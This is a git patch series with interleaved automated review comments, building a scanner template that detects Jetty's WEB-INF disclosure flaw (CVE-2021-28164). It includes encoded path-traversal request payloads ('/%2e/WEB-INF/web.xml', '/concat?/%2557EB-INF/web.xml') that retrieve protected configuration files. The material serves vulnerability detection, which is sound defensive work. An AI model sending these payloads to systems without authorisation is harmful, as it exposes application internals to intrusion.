From 1e0a542b2149d5eeaf51784fa06a685dc9270d7d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:07:03 +0300 Subject: [PATCH 01/11] New test --- ...g-information-disclosure-vulnerability.yml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml new file mode 100644 index 0000000000..13374fad92 --- /dev/null +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml 
@@ -0,0 +1,38 @@ +id: jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability + +info: + name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability + author: noamrathaus + severity: high + reference: | + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + description: | + Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. + + This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + + Impact + This affects all versions of ConcatServlet and WelcomeFilter in versions before 9.4.41, 10.0.3 and 11.0.3. + + Workarounds + If you cannot update to the latest version of Jetty, you can instead deploy your own version of the ConcatServlet and/or the WelcomeFilter by using the code from the latest version of Jetty. + tags: jetty + +requests: + - method: GET + path: + - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "/weaver/" + part: body + - type: word + part: header + words: + - "application/xml" From 27db48cb532b30fce2f919c2d44469e57d1f9204 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:42:41 +0300 Subject: [PATCH 02/11] Another vector --- ...vlet-double-decoding-information-disclosure-vulnerability.yml | 1 + 1 file changed, 1 insertion(+) 
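Review bot: The body matcher `- "/weaver/"` is not a marker of a Jetty web.xml but of one particular application's descriptor, so a vulnerable host serving any other web.xml is reported clean even when the status and `application/xml` checks pass; a descriptor-level token such as `- "<web-app"` (or `"</web-app>"`) pins the check to the file actually being leaked. `reference: |` also produces one block string containing the text `- https://...` rather than a YAML list of URLs; nuclei accepts a plain list here, `reference:` followed by `- https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq`. Finally, a miss on `/concat` does not show the host is patched, since the ConcatServlet is only reachable where the application maps it; that caveat is worth one sentence in the description.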
diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml index 13374fad92..fcaa5e2d31 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml @@ -22,6 +22,7 @@ requests: - method: GET path: - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" + - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" matchers-condition: and matchers: From 46e4d47d9231776e747a21a510e933c4ebb14e9c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:43:04 +0300 Subject: [PATCH 03/11] Another reference --- ...vlet-double-decoding-information-disclosure-vulnerability.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml index fcaa5e2d31..cb7e67f6c3 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml 
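Review bot: The new path `{{BaseURL}}/context/%2e/WEB-INF/web.xml` copies the advisory's example literally, where `/context` stands for whatever context path the application is deployed under; on a real target a literal `/context` segment will normally not exist, so this request can only 404 and adds no detection. If the intent is to probe the root context, `- "{{BaseURL}}/%2e/WEB-INF/web.xml"` is the form that matches the advisory's semantics, and the `/%2e/` vector then needs to be issued per known context path rather than against a fixed name. Note also that this vector belongs to the `%2e` compliance-mode advisory, not to the ConcatServlet double-decoding the description covers, so either the description should name both issues or the two vectors should live in separate templates.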
@@ -6,6 +6,7 @@ info: severity: high reference: | - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. From 23cb4c4d9f81760ef03c48cc4e18c7b6b60c2b5a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:37:40 +0530 Subject: [PATCH 04/11] moving files around --- .../2021/CVE-2021-28164.yml | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) rename vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml => cves/2021/CVE-2021-28164.yml (74%) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/cves/2021/CVE-2021-28164.yml similarity index 74% rename from vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml rename to cves/2021/CVE-2021-28164.yml index cb7e67f6c3..db107faa80 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -1,4 +1,4 @@ -id: jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability +id: CVE-2021-28164 info: name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability 
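Review bot: The id becomes `CVE-2021-28164`, but the name, the description and the first reference in this file still describe the ConcatServlet double-decoding issue (`/concat?/%2557EB-INF/web.xml`), which Jetty publishes under its own advisory (GHSA-gwcr-j4wh-j3cq), separate from the `%2e` compliance-mode advisory (GHSA-v7ff-8wcx-gmc5) that the CVE id is tied to later in this series. Renaming without splitting leaves a template whose id and body disagree, and a hit on the `/concat` vector would be reported to the operator under a CVE that, as far as the references here show, does not cover it. Either keep the ConcatServlet request in its own template with its own id, or restrict this file to the `%2e` vector before adopting the CVE id.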
@@ -9,15 +9,8 @@ info: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. - This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. - - Impact - This affects all versions of ConcatServlet and WelcomeFilter in versions before 9.4.41, 10.0.3 and 11.0.3. - - Workarounds - If you cannot update to the latest version of Jetty, you can instead deploy your own version of the ConcatServlet and/or the WelcomeFilter by using the code from the latest version of Jetty. - tags: jetty + tags: cve,cve2021,jetty requests: - method: GET @@ -34,7 +27,8 @@ requests: words: - "/weaver/" part: body + - type: word part: header words: - - "application/xml" + - "application/xml" \ No newline at end of file From eef515820705d623b35fd28ab239727e6c20e4a2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:38:12 +0530 Subject: [PATCH 05/11] Update CVE-2021-28164.yml --- cves/2021/CVE-2021-28164.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yml index db107faa80..975bab47cf 100644 --- a/cves/2021/CVE-2021-28164.yml +++ b/cves/2021/CVE-2021-28164.yml 
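Review bot: Removing the Impact paragraph also drops the only affected-version statement in the template (`before 9.4.41, 10.0.3 and 11.0.3`), which is what an operator needs to triage a hit and what the description field conventionally carries; consider keeping one sentence, e.g. `Affects ConcatServlet and WelcomeFilter in Jetty before 9.4.41, 10.0.3 and 11.0.3.` The second hunk also leaves the file without a trailing newline (`\ No newline at end of file`), which yamllint flags and which will churn the next diff touching the last matcher line.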
@@ -4,12 +4,12 @@ info: name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability author: noamrathaus severity: high - reference: | - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + reference: | + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 tags: cve,cve2021,jetty requests: From 1299ae621fd719b162c769226d5cd09ee948de87 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:39:19 +0530 Subject: [PATCH 06/11] Update CVE-2021-28164.yml --- cves/2021/CVE-2021-28164.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yml index 975bab47cf..6c5d5c88ba 100644 --- a/cves/2021/CVE-2021-28164.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -1,7 +1,7 @@ id: CVE-2021-28164 info: - name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability + name: Authorization Before Parsing and Canonicalization in jetty author: noamrathaus severity: high description: | 
From ccdb667d3bf392a482f9bed151a0dde9ade601a2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:42:14 +0530 Subject: [PATCH 07/11] YML to YAML --- cves/2021/{CVE-2021-28164.yml => CVE-2021-28164.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2021/{CVE-2021-28164.yml => CVE-2021-28164.yaml} (100%) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yaml similarity index 100% rename from cves/2021/CVE-2021-28164.yml rename to cves/2021/CVE-2021-28164.yaml From feb42e49b092f111193fb02e69587abe4f66c623 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 13 Jun 2021 09:53:47 +0300 Subject: [PATCH 08/11] Reduce chances of FP --- vulnerabilities/other/maian-cart-preauth-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index 6888e6a4f2..3290e2d7fd 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -55,4 +55,5 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_3, "{{randstr_1}}")' \ No newline at end of file + - 'contains(body_3, "{{randstr_1}}")' + - "status_code_3 == 200" \ No newline at end of file From 3369c5a4dd5a6bf63036b09cf8a22a5187568e92 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 13 Jun 2021 11:55:20 +0300 Subject: [PATCH 09/11] Reference --- vulnerabilities/other/ns-asg-file-read.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 66e112d2de..2f34341723 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -4,6 +4,7 @@ info: name: NS ASG Arbitrary File Read author: pikpikcu severity: high + reference: https://zhuanlan.zhihu.com/p/368054963 tags: nsasg,lfi requests: 
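Review bot: The added `- "status_code_3 == 200"` does not reduce false positives as the subject intends: nuclei combines multiple `dsl` expressions with `or` unless the matcher sets `condition: and`, so after this change any 200 response to the third request matches regardless of whether `{{randstr_1}}` is echoed in the body, which is strictly looser than the single expression it replaces. Add `condition: and` under `- type: dsl`, or fold the check into one expression, `- 'contains(body_3, "{{randstr_1}}") && status_code_3 == 200'`. The matcher block and the request sequence it refers to start above this hunk and are not visible here.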
From 809668943f3d9283fa0f6c609f068195eea3a2d3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 23:54:29 +0530 Subject: [PATCH 10/11] minor changes --- cves/2021/CVE-2021-28164.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 6c5d5c88ba..8a507e6cbd 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -1,31 +1,31 @@ id: CVE-2021-28164 info: - name: Authorization Before Parsing and Canonicalization in jetty + name: Jetty Authorization Before Parsing and Canonicalization author: noamrathaus severity: high description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. reference: | - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 + - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty requests: - method: GET path: - - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" - - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" + - "{{BaseURL}}/%2e/WEB-INF/web.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "/weaver/" + - "" part: body - type: word 
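Review bot: The body matcher changes from `"/weaver/"` to `""`, and an empty word is contained in every response body, so the body check no longer contributes anything and a 200 with an `application/xml` header on `/%2e/WEB-INF/web.xml` is enough to flag the host; if the empty string is a rendering artefact that stripped a tag-like token, the intended value should be a descriptor marker such as `- "<web-app"`, and if it is literal it should be replaced by one. Dropping `/context/` from the path also means only an application on the root context is probed; the advisory's `/context/%2e/WEB-INF/web.xml` form implies the request should be run per deployed context path, which is worth stating in the description. The hunk as shown ends at `- type: word`, so the remaining header-matcher lines are outside this view.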
From a9a161f8c62f0467a03e030bc2fd00fb8ccc7d58 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 23:56:33 +0530 Subject: [PATCH 11/11] Update CVE-2021-28164.yaml --- cves/2021/CVE-2021-28164.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 8a507e6cbd..a12313586b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -5,8 +5,7 @@ info: author: noamrathaus severity: high description: | - Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. - This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. reference: | - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
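Review bot: The new description gives `/context/%2e/WEB-INF/web.xml` as the example, while the request this template actually sends (outside this hunk) is `{{BaseURL}}/%2e/WEB-INF/web.xml`; the text should either say that `/context` is a placeholder for the deployed context path or use the same root-context form the request uses, so a reader matching a hit against the description is not misled. The rewrite also removes every affected-version statement; the `%2e` compliance-mode advisory covers only a narrow Jetty release range (a couple of 9.4.3x releases, as far as I recall — confirm against GHSA-v7ff-8wcx-gmc5), and recording that keeps a hit triageable, e.g. `Affected versions: see GHSA-v7ff-8wcx-gmc5; fixed in the release following the affected 9.4.x range.`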